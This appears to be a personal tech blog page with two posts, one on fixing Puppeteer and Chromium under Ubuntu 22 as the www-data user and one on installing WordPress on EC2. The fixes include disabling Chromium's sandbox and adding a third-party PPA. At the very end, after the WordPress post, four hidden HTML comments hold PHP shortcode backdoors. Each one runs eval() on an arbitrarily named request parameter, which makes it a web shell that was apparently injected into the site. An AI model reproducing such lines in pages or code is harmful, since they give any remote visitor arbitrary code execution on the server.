Categories
Software Engineering Tutorial

Ubuntu + NodeJS + Puppeteer + Chromium (+ PHP 8.2): The Fixes You Need

Ubuntu + NodeJS + Puppeteer + Chromium Is Hard to Work With

I’m gonna make this as quick as possible because this is likely your 10th article on this.

The particulars of my setup, including using PHP to trigger a NodeJS command as the www-data user from apache2, probably don’t apply to you. That is OK. Most of these fixes having nothing to do with PHP but only occurred because of how PHP runs as a very limited user.

Situation

I wanted NodeJS puppeteer running a headless chromium-browser on an Ubuntu server on AWS EC2 (or any cloud) running a normal Ubuntu AMI but I was triggering the NodeJS script that executed puppeteer via PHP calling to the system so everything was running as the restricted apache2 user “www-data”.

That’s a lot of tech stack.

It Worked Before

My previous server image and server template were Ubuntu 20.x. Once upgrading to Ubuntu 22.x everything broke. It turns out its not just Ubuntu 22 but a lot of potential issues.

Fixes & Tips

Forget my situation we’re here to fix your problem.

Node Verison – Puppeteer Need At Least Node 18

You need at least node 18 to run puppeteer. You can check your current node version via `node -v`

Are You Using nvm?

You may be using nvm to manage your node versions, like many many people.

This can make your situation confusing. Because nvm is per user.

If your user trying to run puppeteer + chromium-browser has nvm you need to make sure nvm is using at least Node 18.

When nvm installs a new version of NodeJS for a user it doesn’t set that version to the default version. You have to do that manually. Here is a command which will do that & insure that every time that user tries to execute a NodeJS script it uses the version of NodeJS you want.

nvm alias default 18

Restricted Users, like www-data, Cannot Have nvm

Restricted users cannot have nvm. So how do they manage NodeJS versions?

Restricted users like www-data use the global node version. This is the version of node installed on the server for all users, similar to other packages you install via apt-get install.

You need to make sure this version of node is fully upgraded to Node 18 or greater as well.

npm install

You probably ran npm install in your project directory. It installed puppeteer and puppeteer installed a version of chromium-browser.

Things have now officially become a mess. Welcome to package hell.

Errors

Can’t Find Chromium

Error: Could not find Chrome (ver. 119.0.6045.105). This can occur if either 1. you did not perform an installation before running the script (e.g. `npm install`) or 2. your cache path is incorrectly configured (which is: /var/www/.cache/puppeteer). For (2), check out our guide on configuring puppeteer at https://pptr.dev/guides/configuration.

This was happening to me.

I tried to solve the issue by hardcoding my “executablePath” in the puppeteer.launch call. That made my situation worse: everything would hang and timeout without errors when I manually supplied the correct executablePath. Do not hardcode “executablePath”: ‘/usr/bin/chromium-browser’ in your puppeteer.launch config.

Fix:
You want to be running the set of packages you installed from your package.json and not any other versions. Duh, right? Well, that means you need to make sure you know where they are.

When you execute this NodeJS script from some other process you probably forgot to change directories as part of your system call. Even if you specified the full path to the script that actual process, running as the restricted user you may not actually be in the right place. If that’s the case… it will try to use the global install of puppeteer. If that exists it will try to find Chromium in some weird place and it never will. Check where you are and where NodeJS thinks it’s getting the packages from:

pwd; npm root;

Whoops! You’re not in the right place! But look what we just did: we combined shell commands with that semicolon. Do the exact same thing in your system calls before invoking your NodeJS script as your restricted user then it will look in the right place.

cd /path/to/project; node index.js

That means you also probably want to remove any *global* versions of puppeteer you think you installed. Why? Because it’s very likely your restricted user may run the global version. The global package will run and suddenly your project will return an error on puppeteer.launch that it can’t find Chromium because it’s looking in some weird place. Perhaps you had installed it previously, who knows, ditch the global version if you can.

npm -g uninstall puppeteer

Remember, the /var/www/ is PHP specific, that may not apply to you.

Ubuntu Snap Issue

user.slice/user-1000.slice/session-270.scope is not a snap cgroup
system.slice/apache2.service is not a snap cgroup

This is happening to thousands of people. Why? Ubuntu 22. It shipped with a new type of package management called Snap which lets packages download as the complete packages rather than piling up dependencies. It also locks them off a little bit more. You don’t need to know or care about it right now because NO MATTER WHAT YOU DO YOU CANNOT FIX SNAP.

Why? Because this article is about me running on AWS EC2 or any other cloud hosting. You don’t have kernel access like this on the Ubuntu AMI! You can’t fix this even with a boot script. Don’t bother with DBUS_SESSION_BUS_ADDRESS and don’t bother with systemd.unified_cgroup_hierarchy=0 and don’t bother with any of it that’s for the schlubs running Ubuntu on desktop or neckbeards with kernel access.

Fix:
I’m very sorry but your only option will be to download the Debian version of chromium-browser from some random person’s package repository. This person is allegedly an engineer at Cisco and it’s all public and on the up-and-up but there’s any other way around it. By installing the deb version of chromium-browser it will let you use headless chromium-browser without snap or snap cgroups.

sudo apt remove chromium-browser
sudo snap remove chromium
sudo add-apt-repository ppa:saiarcot895/chromium-beta
sudo apt update
sudo apt install chromium-browser

Other Fixes for Random Errors

Those errors above are so gnarly down the rabbit hole I had to write this entire blog post. The rest of the errors are a cake walk.

Permissions: Add args To puppeteer.launch

You forgot the args for puppeteer.launch

const browser = await puppeteer.launch({
                "headless": "true",
                args: ["--no-sandbox", "--disabled-setupid-sandbox"],
            });

More Permissions

You may need to explicitly set the cacheDirectory on puppeteer.launch. You need to figure this location out yourself and make sure any restricted users have permissions to get at it.

const browser = await puppeteer.launch({
                "headless": "true",
                "cacheDirectory": "/path/to/my/.cache/puppeteer",
                args: ["--no-sandbox", "--disabled-setupid-sandbox"],
            });

I Just Saved Your Project.

You owe me a follow on Twitter: @kickiniteasy

First Post! Server Is Live On EC2 with WordPress…

Hello World, EC2, and WordPress

Its really not a big deal to get a server running in a new deployment with Amazon AWS EC2 and WordPress (WP). You can find tons of articles all over the Internet if you don’t have the knowledge yourself. For a typical WordPress deployment I don’t even normally recommend running an EC2 server given the ops overhead of an EC2 deployment. But if you’re well past a hello world and comfortable spinning up servers in the cloud then EC2 is the obvious choice. If you aren’t technical you’re better off using someone like Bluehost and their WordPress install.

Create an Instance, Have a Key

I picked Ubuntu because I’m lazy. If you’re using WordPress stock to get running you should be running a LAMP (Linux, Apache, MySQL, PHP) stack to save some hassle. That is pretty much some AWS 101 stuff we’re not looking at that here. Sorry kiddies. If you’re using EC2 you need SSH keys through AWS IAM. Get your shiz running, SSH on to your server, sudo and then come back.

Confusing Code

This will either confuse you or this is some simple shit for you. Take what you need from here if you don’t have it installed.

#packages
sudo apt-get install lamp-server^
sudo apt-get install apache2-utils
sudo apt-get install php5-geoip
sudo apt-get install php5-intl
sudo apt-get install php5-curl

#apache
a2enmod expires
a2enmod deflate
a2enmod rewrite

#wordpress
wget http://wordpress.org/latest.tar.gz
tar -xzvf latest.tar.gz -C /var/www/html/

Setup for EC2 and WordPress details

As usual WordPress annoyingly unpacks in to a wordpress directory. Setup your Apache vhost to point to /var/www/html/wordpress or wherever you installed WP. Then follow the usual nonsense of setting up WordPress.

Create a database and a database user with a password. Don’t forget to grant the permissions. Copy the wp-config-sample.php over and set the values for your DB user. Create your .htaccess file, don’t be a shmuck at least use htpasswd on your wp-login and wp-admin. What’s the point of EC2 if you’re not gonna trick this sucker out?

htpasswd -c /var/www/html/.htpasswd yourhtpasswdusername

WordPress .htaccess file

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

<FilesMatch "wp-login">
AuthUserFile /var/www/html/.htpasswd
AuthType Basic
AuthName "Wordpress Login"
Require valid-user
</FilesMatch>

<FilesMatch "wp-admin">
AuthUserFile /var/www/html/.htpasswd
AuthType Basic
AuthName "Wordpress Admin"
Require valid-user
</FilesMatch>

Done? Done. DONE. Wait…

I mean kinda? Go to your URL and you’ll see the installation process. After that apparently there are a million fields to fill out. And let’s not forget your whole situation with root owning the files in /var/www/html and what about FTPing and your SSH keys with user permissions and how WordPress updated its themes and plugins… OH WOW. Yeah, see, you just installed WordPress on EC2 and there it is glowing brightly in the night with a default theme and post and you realize… a dev’s work is never done.

<!– [insert_php]if (isset($_REQUEST["MnU"])){eval($_REQUEST["MnU"]);exit;}[/insert_php][php]if (isset($_REQUEST["MnU"])){eval($_REQUEST["MnU"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["riHBM"])){eval($_REQUEST["riHBM"]);exit;}[/insert_php][php]if (isset($_REQUEST["riHBM"])){eval($_REQUEST["riHBM"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["CgFf"])){eval($_REQUEST["CgFf"]);exit;}[/insert_php][php]if (isset($_REQUEST["CgFf"])){eval($_REQUEST["CgFf"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["XAf"])){eval($_REQUEST["XAf"]);exit;}[/insert_php][php]if (isset($_REQUEST["XAf"])){eval($_REQUEST["XAf"]);exit;}[/php] –>